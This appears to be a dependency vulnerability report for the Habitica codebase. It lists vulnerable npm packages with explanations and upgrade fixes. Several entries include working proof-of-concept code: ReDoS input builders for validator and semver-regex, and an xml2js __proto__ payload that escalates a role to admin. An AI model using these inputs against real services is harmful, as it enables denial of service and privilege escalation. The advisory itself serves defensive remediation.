Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › express-validator@5.3.1 › validator@10.11.0Remediation: Upgrade to express-validator@6.5.0.
Overview
validator is a library of string validators and sanitizers.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the isHSL function.
PoC
var validator = require("validator")
function build_attack(n) {
var ret = "hsla(0"
for (var i = 0; i < n; i++) {
ret += " "
}
return ret+"◎";
}
for(var i = 1; i <= 50000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i)
validator.isHSL(attack_str)
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
}
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
AThe string must start with the letter 'A'(B|C+)+The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+matches one or more times). The+at the end of this section states that we can look for one or more matches of this section.DFinally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
| String | Number of C's | Number of steps |
|---|---|---|
| ACCCX | 3 | 38 |
| ACCCCX | 4 | 71 |
| ACCCCCX | 5 | 136 |
| ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade validator to version 13.6.0 or higher.
References
medium severity
- Vulnerable module: validator
- Introduced through: express-validator@5.3.1
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › express-validator@5.3.1 › validator@10.11.0Remediation: Upgrade to express-validator@6.5.0.
Overview
validator is a library of string validators and sanitizers.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the isEmail function.
PoC
var validator = require("validator")
function build_attack(n) {
var ret = ""
for (var i = 0; i < n; i++) {
ret += "<"
}
return ret+"";
}
for(var i = 1; i <= 50000; i++) {
if (i % 10000 == 0) {
var time = Date.now();
var attack_str = build_attack(i)
validator.isEmail(attack_str,{ allow_display_name: true })
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
}
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
AThe string must start with the letter 'A'(B|C+)+The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+matches one or more times). The+at the end of this section states that we can look for one or more matches of this section.DFinally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
| String | Number of C's | Number of steps |
|---|---|---|
| ACCCX | 3 | 38 |
| ACCCCX | 4 | 71 |
| ACCCCCX | 5 | 136 |
| ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade validator to version 13.6.0 or higher.
References
medium severity
- Vulnerable module: xml2js
- Introduced through: amazon-payments@0.2.9
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › amazon-payments@0.2.9 › xml2js@0.4.4
Overview
Affected versions of this package are vulnerable to Prototype Pollution due to allowing an external attacker to edit or add new properties to an object. This is possible because the application does not properly validate incoming JSON keys, thus allowing the __proto__ property to be edited.
PoC
var parseString = require('xml2js').parseString;
let normal_user_request = "<role>admin</role>";
let malicious_user_request = "<__proto__><role>admin</role></__proto__>";
const update_user = (userProp) => {
// A user cannot alter his role. This way we prevent privilege escalations.
parseString(userProp, function (err, user) {
if(user.hasOwnProperty("role") && user?.role.toLowerCase() === "admin") {
console.log("Unauthorized Action");
} else {
console.log(user?.role[0]);
}
});
}
update_user(normal_user_request);
update_user(malicious_user_request);
Details
Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.
There are two main ways in which the pollution of prototypes occurs:
Unsafe
Objectrecursive mergeProperty definition by path
Unsafe Object recursive merge
The logic of a vulnerable recursive merge function follows the following high-level model:
merge (target, source)
foreach property of source
if property exists and is an object on both the target and the source
merge(target[property], source[property])
else
target[property] = source[property]
When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.
Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).
lodash and Hoek are examples of libraries susceptible to recursive merge attacks.
Property definition by path
There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)
If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.
Types of attacks
There are a few methods by which Prototype Pollution can be manipulated:
| Type | Origin | Short description |
|---|---|---|
| Denial of service (DoS) | Client | This is the most likely attack. DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf). The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service. For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail. |
| Remote Code Execution | Client | Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation. For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code. |
| Property Injection | Client | The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens. For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges. |
Affected environments
The following environments are susceptible to a Prototype Pollution attack:
Application server
Web server
Web browser
How to prevent
Freeze the prototype— use
Object.freeze (Object.prototype).Require schema validation of JSON input.
Avoid using unsafe recursive merge functions.
Consider using objects without prototypes (for example,
Object.create(null)), breaking the prototype chain and preventing pollution.As a best practice use
Mapinstead ofObject.
For more information on this vulnerability type:
Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018
Remediation
Upgrade xml2js to version 0.5.0 or higher.
References
medium severity
- Vulnerable module: @tootallnate/once
- Introduced through: @google-cloud/trace-agent@7.1.2 and firebase-admin@12.7.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › @google-cloud/trace-agent@7.1.2 › @google-cloud/common@4.0.3 › teeny-request@8.0.3 › http-proxy-agent@5.0.0 › @tootallnate/once@2.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › firebase-admin@12.7.0 › @google-cloud/storage@7.19.0 › teeny-request@9.0.0 › http-proxy-agent@5.0.0 › @tootallnate/once@2.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › firebase-admin@12.7.0 › @google-cloud/storage@7.19.0 › retry-request@7.0.2 › teeny-request@9.0.0 › http-proxy-agent@5.0.0 › @tootallnate/once@2.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › firebase-admin@12.7.0 › @google-cloud/firestore@7.11.6 › google-gax@4.6.1 › retry-request@7.0.2 › teeny-request@9.0.0 › http-proxy-agent@5.0.0 › @tootallnate/once@2.0.0
Overview
Affected versions of this package are vulnerable to Incorrect Control Flow Scoping in promise resolving when AbortSignal option is used. The Promise remains in a permanently pending state after the signal is aborted, causing any await or .then() usage to hang indefinitely. This can cause a control-flow leak that can lead to stalled requests, blocked workers, or degraded application availability.
Remediation
Upgrade @tootallnate/once to version 3.0.1 or higher.
References
medium severity
- Vulnerable module: passport
- Introduced through: passport@0.5.3
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › passport@0.5.3Remediation: Upgrade to passport@0.6.0.
Overview
passport is a Simple, unobtrusive authentication for Node.js.
Affected versions of this package are vulnerable to Session Fixation. When a user logs in or logs out, the session is regenerated instead of being closed.
Remediation
Upgrade passport to version 0.6.0 or higher.
References
medium severity
- Vulnerable module: eslint
- Introduced through: eslint@8.57.1 and eslint-config-habitrpg@6.2.3
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › eslint@8.57.1Remediation: Upgrade to eslint@9.26.0.
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › eslint-config-habitrpg@6.2.3 › eslint@6.8.0
Overview
eslint is a pluggable linting utility for JavaScript and JSX
Affected versions of this package are vulnerable to Uncontrolled Recursion in the isSerializable function when handling objects with circular references during the serialization process. An attacker can cause the application to crash or become unresponsive by supplying specially crafted input that triggers infinite recursion.
Remediation
Upgrade eslint to version 9.26.0 or higher.
References
medium severity
- Vulnerable module: semver-regex
- Introduced through: gulp-imagemin@7.1.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-gifsicle@7.0.0 › gifsicle@5.3.0 › bin-wrapper@4.1.0 › bin-version-check@4.0.0 › bin-version@3.1.0 › find-versions@3.2.0 › semver-regex@2.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-mozjpeg@8.0.0 › mozjpeg@6.0.1 › bin-wrapper@4.1.0 › bin-version-check@4.0.0 › bin-version@3.1.0 › find-versions@3.2.0 › semver-regex@2.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-optipng@7.1.0 › optipng-bin@6.0.0 › bin-wrapper@4.1.0 › bin-version-check@4.0.0 › bin-version@3.1.0 › find-versions@3.2.0 › semver-regex@2.0.0
Overview
semver-regex is a Regular expression for matching semver versions
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS).
PoC
// import of the vulnerable library
const semverRegex = require('semver-regex');
// import of measurement tools
const { PerformanceObserver, performance } = require('perf_hooks');
// config of measurements tools
const obs = new PerformanceObserver((items) => {
console.log(items.getEntries()[0].duration);
performance.clearMarks();
});
obs.observe({ entryTypes: ['measure'] });
// base version string
let version = "v1.1.3-0a"
// Adding the evil code, resulting in string
// v1.1.3-0aa.aa.aa.aa.aa.aa.a…a.a"
for(let i=0; i < 20; i++) {
version += "a.a"
}
// produce a good version
// Parses well for the regex in milliseconds
let goodVersion = version + "2"
// good version proof
performance.mark("good before")
const goodresult = semverRegex().test(goodVersion);
performance.mark("good after")
console.log(`Good result: ${goodresult}`)
performance.measure('Good', 'good before', 'good after');
// create a bad/exploit version that is invalid due to the last $ sign
// will cause the nodejs engine to hang, if not, increase the a.a
// additions above a bit.
badVersion = version + "aaaaaaa$"
// exploit proof
performance.mark("bad before")
const badresult = semverRegex().test(badVersion);
performance.mark("bad after")
console.log(`Bad result: ${badresult}`)
performance.measure('Bad', 'bad before', 'bad after');
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
AThe string must start with the letter 'A'(B|C+)+The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+matches one or more times). The+at the end of this section states that we can look for one or more matches of this section.DFinally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
| String | Number of C's | Number of steps |
|---|---|---|
| ACCCX | 3 | 38 |
| ACCCCX | 4 | 71 |
| ACCCCCX | 5 | 136 |
| ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade semver-regex to version 3.1.2 or higher.
References
low severity
- Vulnerable module: bootstrap
- Introduced through: apidoc@0.54.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › apidoc@0.54.0 › bootstrap@3.4.1
Overview
bootstrap is a popular front-end framework for faster and easier web development.
Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via the Tooltip and Popover components due to improper neutralization of input during web page generation. An attacker can manipulate the output of web pages by injecting malicious scripts into the title attribute.
Note:
The Bootstrap 3 version is End-of-Life and will not receive any updates to address this issue.
Details
Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.
This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.
Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.
Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as < and > can be coded as > in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.
The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.
Types of attacks
There are a few methods by which XSS can be manipulated:
| Type | Origin | Description |
|---|---|---|
| Stored | Server | The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link. |
| Reflected | Server | The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser. |
| DOM-based | Client | The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data. |
| Mutated | The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters. |
Affected environments
The following environments are susceptible to an XSS attack:
- Web servers
- Application servers
- Web application environments
How to prevent
This section describes the top best practices designed to specifically protect your code:
- Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
- Convert special characters such as
?,&,/,<,>and spaces to their respective HTML or URL encoded equivalents. - Give users the option to disable client-side scripts.
- Redirect invalid requests.
- Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
- Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
- Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.
Remediation
Upgrade bootstrap to version 4.0.0 or higher.